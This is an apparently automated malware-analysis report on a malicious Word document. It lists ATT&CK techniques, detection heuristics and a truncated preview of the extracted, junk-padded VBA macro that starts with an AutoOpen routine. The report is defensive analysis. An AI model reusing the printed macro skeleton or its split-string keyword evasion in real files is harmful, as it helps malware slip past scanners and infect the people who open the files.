Verdict: MALICIOUS
Risk Score: 322
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with obfuscated API calls, specifically reassembling 'Win32_Process'. The presence of an AutoOpen macro and GetObject calls, combined with the 'Password-protected archive handoff' heuristic, strongly suggests the macro is designed to download and execute a secondary payload, likely disguised as an archive requiring a password. The ClamAV detection further supports its malicious nature.
Heuristics (9)
- ClamAV: Doc.Malware.Obfuse-6894441-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Obfuse-6894441-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE): Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 63810 bytes |

SHA-256 of macros.bas: a4c3eb7e584454eb13fc97f82cee3c3356d12e882701655861e754e070dc9b3c
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "EooGUxB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function w4AADwBo()
If GQAQAAo = axCDGB Then
UAAAAAAA = 466952283 * PDc11DXG
bDADcA = JcAGoc - 684631648 + 135173192 + GBAAAAXD * 516719261 / 726471564 + 648551095 / Chr(985056106 / CSng(474302865 + Round(toCAAAA))) + 185581019 * Log(AB4Xx4) - 151421966 - 718397745 + lADA1AA * CLng(iXZkAxkU - Atn(pBAQAoZ / 578193572 / 887471659 + ZAABAU))
hAAAXAD = 508327790 * JoACAA
End If
If dBBABAUA = zA11AD Then
dQ_AxAAA = 402393400 * WXAo_co
NAA_4BAo = AUkA4QXA - 570668213 + 337835927 + VQQcAD * 757953111 / 834266012 + 317255437 / Chr(383656263 / CSng(344146892 + Round(qAxkAAB))) + 588917922 * Log(J1DxkAA) - 306596959 - 393301097 + RoUAx_kB * CLng(CGAQBXG - Atn(HUAABGAA / 630805576 / 575746931 + zAAZxA))
wAAACk = 618336604 * NAZA_G
End If
If uAU1AZGQ = hkwZwGB Then
IAokAUBk = 512730943 * wUCXCAAQ
fADBA_Gx = TBA_BxxQ - 579013270 + 474389174 + TCAAAx * 564295169 / 414379212 + 520262437 / Chr(91057043 / CSng(393720444 + Round(uZ1AAXD))) + 42933899 * Log(VGZDAQA) - 189588314 - 445845753 + oAUx1A_ * CLng(PAcACQ - Atn(R11ko_A / 561147237 / 661189482 + hoACAkD))
vCQAc1XA = 696906833 * VAcBA1A
End If
If HAXB1AAc = T_AxACB Then
pUwXcCA = 826182758 * S11A_QA
GQAAxx = nBZZAD - 340538482 + 239211030 + HXAcAoUD * 67817526 / 61642054 + 410678146 / Chr(846137927 / CSng(489950363 + Round(l1AADw))) + 176597466 * Log(dAADACCA) - 319320728 - 629361659 + MAAAwGC * CLng(vD4wAAQZ - Atn(wBAUAAA4 / 107070645 / 97629358 + s4BZkUB))
MUAAXAo = 834933071 * QACAoXA
End If
If ZGo1xkA = jDwXZA4 Then
JZZAAZ = 808910344 * PDQCUAGA
NBkAAxUZ = wBGAADAo - 697641972 + 238579716 + vX_UBGD * 53046749 / 519593622 + 686040830 / Chr(88222528 / CSng(943366783 + Round(DQQQxc))) + 520183065 * Log(nGAZAU) - 778454554 - 126415447 + pAAAAX * CLng(MAw_AA - Atn(zkAwUC / 574893743 / 190492655 + KXUAABQA))
IZ_41B1 = 72678777 * wXAAAG
End If
If hQCww4_A = CBU4cZA Then
lGQUkADB = 758122670 * cxACAc
vAA4oBUA = LUcAxA - 23241446 + 103597295 + vAAUAADx * 390292787 / 448252209 + 878150079 / Chr(984180089 / CSng(225039960 + Round(uAAGoAGo))) + 250999568 * Log(RZxUAAA_) - 947597680 - 772639707 + pUADAQ * CLng(ZDAAkc - Atn(Fw1AAxAB / 9191079 / 984161703 + qQCkoA))
GDADAA1A = 345809850 * zXwDUZ
End If
If G_AAZQk = WkQDA14A Then
bAQCDwAo = 258795957 * LcUQU_AQ
GGDA1A = mAAA__B - 337034406 + 530879573 + IoBwAwk * 161068191 / 557922174 + 339947291 / Chr(829342812 / CSng(315946567 + Round(bUwUoD))) + 771308079 * Log(bBU_ZAC) - 382694616 - 928322173 + bU1_ABA * CLng(AAAUZCD - Atn(hAAxDAU / 641429071 / 744397674 + fCACwA))
nGAAZZ = 536969756 * jcBB4A1B
End If
End Function
Sub autoopen()
On Error Resume Next
If Z4ADAAU = FXABB1 Then
LDAUcDA = 589186681 * sADUoAQ
tCAXBUA = DDDBxX4C - 710047603 + 870695193 + fZwDBQC * 386877617 / 323738914 + 64453685 / Chr(311817315 / CSng(82036562 + Round(d_AZxX))) + 951623794 * Log(JD1AAkA) - 37113582 - 652607472 + OAQBAA * CLng(UxAxAo4k - Atn(s1BocA / 14320882 / 539689537 + OUxGAU))
zAQDAw = 329283678 * R_A1ck
End If
If FAcBkk4k = oZDABAAC Then
a4wCABU_ = 923257081 * rBokAUo
PD4AQwQ = zAGZk__ - 606329578 + 35544645 + VAX4ACA * 489019160 / 764481967 + 910743537 / Chr(126580077 / CSng(831895532 + Round(dkxBXCA))) + 262365803 * Log(ZCAAUAAG) - 493172871 - 815209724 + JcBABA * CLng(swDDBD_ - Atn(YQA1Akk4 / 925777078 / 96695367 + YAQDACxx))
bBwDAow = 158719334 * AAxAoo
End If
If ukACAB4w = P_AUoBA Then
koAUXBD = 388156031 * m1AADA
ZCAA1U1 = zZCAAAZ - 515433028 + 930484537 + YDDXUAoD * 155602503 / 151232580 + 970679556 / Chr(597750690 / CSng(648829663 + Round(bG
... (truncated)